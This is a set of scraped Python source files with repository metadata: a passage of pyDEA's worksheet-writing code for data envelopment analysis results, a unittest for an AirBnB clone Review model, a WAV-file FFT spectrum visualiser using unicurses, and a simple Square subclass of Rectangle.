params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
return self.create_sheet_input_output_data_base(
work_sheet, solution,
self._get_const_multiplier, 'InputOutputWeights',
start_row_index, params_str)
@staticmethod
def _get_data_multiplier(solution, dmu_code, category):
''' Helper method that is used for writing weighted data
to a given output.
Args:
solution (Solution): solution.
dmu_code (str): DMU code.
category (str): category name.
Returns:
int: a scale value to scale weights.
'''
return solution._input_data.coefficients[dmu_code, category]
def create_sheet_weighted_data(self, work_sheet, solution,
start_row_index, params_str):
''' Writes weighted data to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
return self.create_sheet_input_output_data_base(
work_sheet, solution,
self._get_data_multiplier, 'WeightedData',
start_row_index, params_str)
def create_sheet_targets(self, work_sheet, solution, start_row_index,
params_str):
''' Writes targets to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'Targets'
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 1, 'Category')
work_sheet.write(start_row_index + 1, 2, 'Original')
work_sheet.write(start_row_index + 1, 3, 'Target')
work_sheet.write(start_row_index + 1, 4, 'Radial')
work_sheet.write(start_row_index + 1, 5, 'Non-radial')
if self.categorical is not None:
work_sheet.write(
start_row_index + 1, 6,
'Categorical: {0}'.format(self.categorical))
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
row_index = start_row_index + 2
for dmu_code in ordered_dmu_codes:
work_sheet.write(
row_index, 0, solution._input_data.get_dmu_user_name(dmu_code))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
once = True
all_lambda_vars = solution.get_lambda_variables(dmu_code)
for category in chain(solution._input_data.input_categories,
solution._input_data.output_categories):
work_sheet.write(row_index, 1, category)
original = solution._input_data.coefficients[
dmu_code, category]
work_sheet.write(row_index, 2, original)
target = calculate_target(category, all_lambda_vars,
solution._input_data.coefficients)
radial_reduction = calculate_radial_reduction(
dmu_code, category, solution._input_data,
solution.get_efficiency_score(dmu_code),
solution.orientation)
non_radial_reduction = calculate_non_radial_reduction(
target, radial_reduction, original)
if abs(non_radial_reduction) < ZERO_TOLERANCE:
non_radial_reduction = 0
work_sheet.write(row_index, 3, target)
work_sheet.write(row_index, 4, radial_reduction)
work_sheet.write(row_index, 5, non_radial_reduction)
if once:
if self.categorical is not None:
work_sheet.write(
row_index, 6,
int(solution._input_data.coefficients[
dmu_code, self.categorical]))
work_sheet.write(
row_index + 1, 0,
solution.get_efficiency_score(dmu_code))
once = False
row_index += 1
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 2
return row_index
class FileWriter(object):
''' This class is responsible for writing solution information
into a given output.
Attributes:
params (Parameters): parameters.
writer: object that contains several objects that
have name attribute and implement
write method, it actually writes data to some output
(like file, screen, etc.).
ranks (list of dict of str to double):
list that contains dictionaries that map DMU code
to peel the onion rank.
categorical (str): name of categorical category.
run_date (datetime): date and time when the problem was solved.
total_seconds (float): time (in seconds) needed to solve
the problem.
params_sheet (SheetWithParameters): object that writes
parameters to a given output.
worksheets (list of func): list of functions that will be called
to write solution information to a given output.
start_rows (list of int): list of start row indexes for each
element in worksheets.
existing_sheets (list of func): contains None references in the
beginning, but after at least one call to write_data method
contains a copy of worksheets. It is necessary for appending
data to the same output.
print_params (bool): if set to true parameters are written to
a given output. It ensures that we don't write parameters more
than once if we should append information to the same output.
Args:
params (Parameters): parameters.
writer: object that contains several objects that
have name attribute and implement
write method, it actually writes data to some output
(like file, screen, etc.).
run_date (datetime): date and time when the problem was solved.
total_seconds (float): time (in seconds) needed to solve
the problem.
worksheets (list of func, optional): list of functions that will
be called to write solution information to a given output.
Defaults to None.
ranks (list of dict of str to double, optional):
list that contains dictionaries that map DMU code
to peel the onion rank. Defaults to None.
categorical (str, optional): name of categorical category.
Defaults to None.
'''
def __init__(self, params, writer, run_date, total_seconds,
worksheets=None, ranks=None, categorical=None):
self.params = params
self.writer = writer
self.ranks = ranks
self.categorical = categorical
self.run_date = run_date
self.total_seconds = total_seconds
self.params_sheet = None
if worksheets is not None:
self.worksheets = worksheets
else:
self.worksheets = self.get_default_worksheets()
self.start_rows = [0]*len(self.worksheets)
self.existing_sheets = [None]*len(self.worksheets)
self.print_params = True
def get_default_worksheets(self):
''' Returns a default list of functions that will
be called to write solution information to a given output.
Returns:
list of func: list of functions.
'''
sheet_with_categorical_var = SheetWithCategoricalVar(
self.categorical)
worksheets = [
sheet_with_categorical_var.create_sheet_efficiency_scores,
create_sheet_peers, create_sheet_peer_count,
sheet_with_categorical_var.create_sheet_input_output_data,
sheet_with_categorical_var.create_sheet_weighted_data,
sheet_with_categorical_var.create_sheet_targets]
if self.ranks:
onion_rank_sheet = SheetOnionRank(self.ranks)
worksheets.append(onion_rank_sheet.create_sheet_onion_rank)
self.params_sheet = SheetWithParameters(
self.params, self.run_date,
self.total_seconds).create_sheet_parameters
return worksheets
def write_data(self, solution, params_str='',
progress_recorder=NullProgress()):
''' Writes given solution to a given output.
Args:
solution (Solution): solution.
params_str (str, optional): string that is usually written in
the first row. Defaults to empty string.
progress_recorder (NullProgress, optional): object that
shows progress with writing solution to a given output.
Defaults to NullProgress.
'''
for count, worksheet in enumerate(self.worksheets):
if self.existing_sheets[count] is None:
work_sheet = self.writer.add_sheet(
'Sheet_{count}'.format(count=count))
self.existing_sheets[count] = work_sheet
else:
work_sheet = self.existing_sheets[count]
self.start_rows[count] = (worksheet(work_sheet, solution,
self.start_rows[count],
params_str) + 1)
progress_recorder.increment_step()
# parameters are printed only once to file
if self.print_params:
work_sheet = self.writer.add_sheet(
'Sheet_{count}'.format(count=count + 1))
self.params_sheet(work_sheet, solution, 0, '')
progress_recorder.increment_step()
self.print_params = False
def _calculate_frontier_classification(sum_of_lambda_values):
''' Returns string that describes frontier classification. If
sum_of_lambda_values is > 1, then classification is DRS.
If sum_of_lambda_values is < 1, then
classification is IRS. If sum_of_lambda_values == 1,
then classification is CRS.
Args:
sum_of_lambda_values (double): sum of lambda variables
values.
Returns:
str: frontier classification.
'''
if sum_of_lambda_values > 1:
return 'DRS'
elif sum_of_lambda_values < 1:
return 'IRS'
else:
return 'CRS'
def create_sheet_peers(work_sheet, solution, start_row_index, params_str):
''' Writes peers to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'Peers'
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 2, 'Peer')
work_sheet.write(start_row_index + 1, 3, 'Lambda')
write_classification = False
if bool(solution.return_to_scale):
work_sheet.write(start_row_index + 1, 4, 'Classification')
write_classification = True
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
row_index = start_row_index + 2
for dmu_code in ordered_dmu_codes:
work_sheet.write(row_index, 0, solution._input_data.get_dmu_user_name(
dmu_code))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
lambda_vars = solution.get_lambda_variables(dmu_code)
# sum_of_lambda_values = 0
once = True
# for dmu, lambda_value in lambda_vars.items():
# if lambda_value:
# sum_of_lambda_values += lambda_value
for dmu, lambda_value in lambda_vars.items():
if lambda_value:
dmu_name = solution._input_data.get_dmu_user_name(dmu)
work_sheet.write(row_index, 2, dmu_name)
work_sheet.write(row_index, 3, lambda_value)
if write_classification and once:
work_sheet.write(
row_index, 4, solution.return_to_scale[dmu_code]
#_calculate_frontier_classification(sum_of_lambda_values)
)
once = False
row_index += 1
else:
work_sheet.write(
row_index, 2, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 1
return row_index
def create_sheet_peer_count(work_sheet, solution, start_row_index, params_str):
''' Writes peer counts to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'PeerCount'
work_sheet.write(start_row_index, 0, params_str)
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
work_sheet.write(start_row_index + 1, 0, 'Efficient Peers')
# write names of efficient DMUs first
column_index = 1
for dmu_code in ordered_dmu_codes:
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
if solution.is_efficient(dmu_code):
dmu_name = solution._input_data.get_dmu_user_name(dmu_code)
work_sheet.write(start_row_index + 1, column_index, dmu_name)
column_index += 1
work_sheet.write(start_row_index + 2, 0, 'DMU')
# continue line by line
row_index = start_row_index + 3
nb_peers = defaultdict(int)
for dmu_code in ordered_dmu_codes:
dmu_name = solution._input_data.get_dmu_user_name(dmu_code)
work_sheet.write(row_index, 0, dmu_name)
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
column_index = 1
all_lambda_vars = solution.get_lambda_variables(dmu_code)
for dmu in ordered_dmu_codes:
if (solution.lp_status[dmu] == pulp.LpStatusOptimal and
solution.is_efficient(dmu, all_lambda_vars)):
# get is used since some lambda
# # variables might not be present in categorical model!
lambda_value = all_lambda_vars.get(dmu, 0)
if lambda_value:
work_sheet.write(row_index, column_index, lambda_value)
nb_peers[dmu] += 1
else:
work_sheet.write(row_index, column_index, '-')
column_index += 1
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 1
work_sheet.write(row_index, 0, 'Peer count')
column_index = 1
for dmu_code in ordered_dmu_codes:
if dmu_code in nb_peers.keys():
work_sheet.write(row_index, column_index, nb_peers[dmu_code])
column_index += 1
return row_index
| araith/pyDEA | pyDEA/core/data_processing/write_data.py | write_data.py | py | 30,938 | python | en | code | 38 | github-code | 36 |
73243569705 | #!/usr/bin/python3
"""Unittest module for the Review Class."""
import unittest
from datetime import datetime
import time
from models.review import Review
import re
import json
from models.engine.file_storage import FileStorage
import os
from models import storage
from models.base_model import BaseModel
from tests.test_models.test_base_model import TestBaseModel
class TestReview(TestBaseModel):
"""Test Cases for the Review class."""
def setUp(self):
"""Sets up test methods."""
self.name = "Review"
self.value = Review
def tearDown(self):
"""Tears down test methods."""
self.resetStorage()
pass
def resetStorage(self):
"""Resets FileStorage data."""
FileStorage._FileStorage__objects = {}
if os.path.isfile(FileStorage._FileStorage__file_path):
os.remove(FileStorage._FileStorage__file_path)
def test_instantiation(self):
"""Tests instantiation of Review class."""
b = Review()
self.assertEqual(str(type(b)), "<class 'models.review.Review'>")
self.assertIsInstance(b, Review)
self.assertTrue(issubclass(type(b), BaseModel))
def test_place_id(self):
""" """
new = self.value()
self.assertTrue(hasattr(new, "place_id"))
self.assertEqual(new.place_id, "")
def test_user_id(self):
""" """
new = self.value()
self.assertTrue(hasattr(new, "user_id"))
self.assertEqual(new.user_id, "")
def test_text(self):
""" """
new = self.value()
self.assertTrue(hasattr(new, "text"))
self.assertEqual(new.text, "")
if __name__ == "__main__":
unittest.main()
| olanipekundenis/AirBnB_clone | tests/test_models/test_review.py | test_review.py | py | 1,721 | python | en | code | 0 | github-code | 36 |
1792979964 | import unicurses
import numpy as np
import math
import wave
import struct
import time
stdscr = unicurses.initscr()
unicurses.cbreak()
unicurses.noecho()
unicurses.curs_set(0)
unicurses.keypad(stdscr, True)
LINES, COLS = unicurses.getmaxyx(stdscr)
height = 16
def drawData(data, x, y):
for i in range(len(data)):
v = data[i]
for j in range(height):
c = ' '
if (j <= v - 1):
c = '#'
unicurses.mvaddstr(y + height - 1 - j, x + i, c)
# Initialize matrix
matrix = [0, 0, 0, 0, 0, 0, 0, 0]
power = []
weighting = [2, 2, 8, 8, 16, 32, 64, 64] # Change these according to taste
# Set up audio
wavfile = wave.open('data/rebel-theme.wav','r')
sampleRate = wavfile.getframerate()
noChannels = wavfile.getnchannels()
chunk = 4096 # Use a multiple of 8
# Return power array index corresponding to a particular frequency
def piff(val):
return int(2 * chunk * val / sampleRate)
def calculateLevels(sampleData, chunk):
global matrix
# Convert raw data (ASCII string) to numpy array
data = struct.unpack("%dh" % (len(sampleData) / 2), sampleData)
data = np.array(data, dtype='h')
# Apply FFT - real data
fourier = np.fft.rfft(data)
# Remove last element in array to make it the same size as chunk
fourier = np.delete(fourier, len(fourier) - 1)
# Find average 'amplitude' for specific frequency ranges in Hz
power = np.abs(fourier)
low = 0
high = 156.25
for i in range(8):
matrix[i] = int(np.mean(power[piff(low) : piff(high) : 1]))
low = high
high *= 2
# Tidy up column values for the LED matrix
matrix = np.divide(np.multiply(matrix, weighting), 8000000 / height)
# Set floor at 0 and ceiling at 8 for LED matrix
matrix = matrix.clip(0, height)
return matrix
lastTime = time.clock()
frameTime = chunk / sampleRate
data = wavfile.readframes(chunk)
while data != '' and len(data) > 0:
matrix = calculateLevels(data, chunk)
drawData(matrix, 0, 0)
data = wavfile.readframes(chunk)
unicurses.refresh()
#key = unicurses.getch()
now = time.clock()
time.sleep(max(frameTime - (now - lastTime), 0))
lastTime = now
| AaronLieberman/ArduinoTinkering | FFTTest/FFTTest2-win.py | FFTTest2-win.py | py | 2,207 | python | en | code | 0 | github-code | 36 |
24974566125 | #!/usr/bin/python3
"""Defines a class Square that is a sub class of rectangle"""
Rectangle = __import__('9-rectangle').Rectangle
class Square(Rectangle):
"""A square, sub class of rectangle."""
def __init__(self, size):
"""Inintializes a new instance of Square.
Args:
size (int): size (width and height) of the square
"""
self.integer_validator("size", size)
super().__init__(size, size)
self.__size = size
| Ikechukwu-Miracle/alx-higher_level_programming | 0x0A-python-inheritance/11-square.py | 11-square.py | py | 480 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.